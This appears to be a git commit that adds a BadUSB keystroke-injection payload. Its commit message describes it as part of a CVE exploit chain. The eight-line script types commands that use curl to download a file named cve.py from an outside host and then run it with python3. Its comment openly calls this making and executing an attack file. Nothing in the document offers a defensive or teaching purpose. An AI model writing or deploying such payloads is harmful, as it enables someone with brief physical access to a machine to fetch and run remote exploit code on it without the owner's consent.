Added payloads seperate to cve exploit 'chain'

This commit is contained in:
Jon
2026-05-02 00:06:00 +01:00
parent d2b1466f24
commit 999822fdad
2 changed files with 10 additions and 0 deletions

10
badusb/payload-curl.txt Normal file
View File

@@ -0,0 +1,10 @@
REM make attack file and exec
STRING curl https://copy.fail/exp -o cve.py
ENTER
ENTER
DELAY 100
STRING python3 cve.py
ENTER
ENTER